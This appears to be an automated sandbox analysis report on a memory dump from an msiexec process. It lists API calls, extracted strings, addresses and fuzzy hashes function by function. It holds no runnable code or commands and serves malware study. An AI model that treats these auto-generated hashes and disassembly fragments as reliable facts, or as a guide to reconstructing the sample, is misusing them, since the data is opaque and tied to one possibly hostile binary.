                                                                                          • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                          • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                          • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                          • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                          APIs
                                                                                          • wcschr.MSVCRT ref: 00413972
                                                                                          • wcscpy.MSVCRT ref: 00413982
                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                          • wcscpy.MSVCRT ref: 004139D1
                                                                                          • wcscat.MSVCRT ref: 004139DC
                                                                                          • memset.MSVCRT ref: 004139B8
                                                                                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                          • memset.MSVCRT ref: 00413A00
                                                                                          • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                          • wcscat.MSVCRT ref: 00413A27
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                          • String ID: \systemroot
                                                                                          • API String ID: 4173585201-1821301763
                                                                                          • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                          • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                          • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                          • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcscpy
                                                                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                          • API String ID: 1284135714-318151290
                                                                                          • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                          • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                          • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                          • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                          APIs
                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                          • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                          • strchr.MSVCRT ref: 0040C140
                                                                                          • strchr.MSVCRT ref: 0040C151
                                                                                          • _strlwr.MSVCRT ref: 0040C15F
                                                                                          • memset.MSVCRT ref: 0040C17A
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                          • String ID: 4$h
                                                                                          • API String ID: 4019544885-1856150674
                                                                                          • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                          • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                          • String ID: 0$6
                                                                                          • API String ID: 4066108131-3849865405
                                                                                          • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                          • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 004082EF
                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                          • memset.MSVCRT ref: 00408362
                                                                                          • memset.MSVCRT ref: 00408377
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 290601579-0
                                                                                          • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                          • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                          APIs
                                                                                          • memchr.MSVCRT ref: 00444EBF
                                                                                          • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                          • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                          • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                          • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                          • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                          • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                          • memset.MSVCRT ref: 0044505E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$memchrmemset
                                                                                          • String ID: PD$PD
                                                                                          • API String ID: 1581201632-2312785699
                                                                                          • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                          • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                          • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                          • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                          APIs
                                                                                          • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                          • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                          • GetDC.USER32(00000000), ref: 00409F6E
                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                          • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                          • GetParent.USER32(?), ref: 00409FA5
                                                                                          • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                          • String ID:
                                                                                          • API String ID: 2163313125-0
                                                                                          • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                          • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                          • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                          • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: free$wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 3592753638-3916222277
                                                                                          • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                          • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040A47B
                                                                                          • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                          • wcslen.MSVCRT ref: 0040A4BA
                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                          • wcslen.MSVCRT ref: 0040A4E0
                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                                                          • String ID: %s (%s)$YV@
                                                                                          • API String ID: 3979103747-598926743
                                                                                          • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                          • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                          • wcslen.MSVCRT ref: 0040A6B1
                                                                                          • wcscpy.MSVCRT ref: 0040A6C1
                                                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                          • wcscpy.MSVCRT ref: 0040A6DB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                          • API String ID: 2767993716-572158859
                                                                                          • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                          • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                          APIs
                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                          • wcscpy.MSVCRT ref: 0040DAFB
                                                                                          • wcscpy.MSVCRT ref: 0040DB0B
                                                                                          • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                            • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                          • API String ID: 3176057301-2039793938
                                                                                          • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                          • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                          • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                          • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                          APIs
                                                                                          Strings
                                                                                          • out of memory, xrefs: 0042F865
                                                                                          • database %s is already in use, xrefs: 0042F6C5
                                                                                          • database is already attached, xrefs: 0042F721
                                                                                          • too many attached databases - max %d, xrefs: 0042F64D
                                                                                          • unable to open database: %s, xrefs: 0042F84E
                                                                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpymemset
                                                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                          • API String ID: 1297977491-2001300268
                                                                                          • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                          • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                          APIs
                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                          • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                          • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                          • String ID: ($d
                                                                                          • API String ID: 1140211610-1915259565
                                                                                          • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                          • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                          • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                          • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                          APIs
                                                                                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                          • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                          • GetLastError.KERNEL32 ref: 004178FB
                                                                                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$ErrorLastLockSleepUnlock
                                                                                          • String ID:
                                                                                          • API String ID: 3015003838-0
                                                                                          • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                          • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                          • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                          • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00407E44
                                                                                          • memset.MSVCRT ref: 00407E5B
                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                          • wcscpy.MSVCRT ref: 00407F10
                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                          • String ID:
                                                                                          • API String ID: 59245283-0
                                                                                          • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                          • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                          • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                          • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                          APIs
                                                                                          • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                          • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                          • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy
                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                          • API String ID: 3510742995-3273207271
                                                                                          • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                          • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                          • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                          • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                          APIs
                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                          • memset.MSVCRT ref: 00413ADC
                                                                                          • memset.MSVCRT ref: 00413AEC
                                                                                            • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                          • memset.MSVCRT ref: 00413BD7
                                                                                          • wcscpy.MSVCRT ref: 00413BF8
                                                                                          • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                          • String ID: 3A
                                                                                          • API String ID: 3300951397-293699754
                                                                                          • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                          • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                          • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                          • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                          • wcscpy.MSVCRT ref: 0040D1B5
                                                                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                          • wcslen.MSVCRT ref: 0040D1D3
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                          • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                          • String ID: strings
                                                                                          • API String ID: 3166385802-3030018805
                                                                                          • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                          • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0041249C
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                          • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                          • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                          • wcscpy.MSVCRT ref: 004125A0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
